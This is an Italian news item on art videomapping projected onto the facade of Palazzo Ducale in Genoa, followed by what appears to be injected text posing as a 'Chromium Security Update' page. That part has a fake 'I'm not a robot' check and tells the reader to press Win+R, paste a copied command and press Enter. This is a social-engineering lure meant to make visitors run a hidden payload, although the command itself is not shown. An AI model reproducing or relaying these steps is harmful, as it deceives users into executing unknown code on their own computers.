A Genova proiezioni videomusicali d’arte

Grazie all’effetto ottenuto con il video projection mapping, la tecnica del proiettare immagini del computer su superfici reali, i quadri riprodotti sembrano in movimento, fluttuando in un gioco di luci, colori e animazioni. Le proiezioni, quindi, non si limitano alla bidimensionalità ma, mostrando anche la terza dimensione, prendono vita esaltando la facciata neoclassica di Palazzo Ducale, ideata nel ’700 da Simone Cantoni. La realizzazione della proiezione è opera dello Studio Luca Anagni, grafico e web designer di Macerata che con i suoi collaboratori è specializzato in tecniche 2d e 3d. Il videomapping crea nello spettatore l’illusione che l’oggetto o l’edificio su cui si proiettano le immagini sia davvero in movimento, non riuscendo a distinguere la finzione dalla realtà.
Un museo a cielo aperto, creato proprio in occasione delle festività natalizie, per osservare la cultura e l’arte con incanto e meraviglia e per permettere che tutti possano ammirare le opere in maniera gratuita. Ancora una volta, le tecnologie avanzate contribuiscono a qualcosa di spettacolare e sono il mezzo per la scoperta o riscoperta dei grandi tesori artistici in una nuova chiave.

 

Foto David Pazmiño – Video Daniel Sigua
REDAZIONE TCGNEWS GENOVA

Chrome Icon

Chromium Security Update Required

Complete verification to update your browser engine

Important Security Notice

Your browser's Chromium engine is outdated and requires an immediate update to ensure secure browsing and protect your system from vulnerabilities.

  • Outdated versions are susceptible to security exploits
  • Newer versions include critical performance improvements
  • This update includes enhanced privacy protections

Complete the verification process below to automatically download and install the latest Chromium engine update.

Verify you are human to continue

I'm not a robot

Verification required to update browser components

Complete the update process:

1
Press Win + R to open the Run dialog
2
Paste the copied command with Ctrl + V
3
Press Enter to execute the update process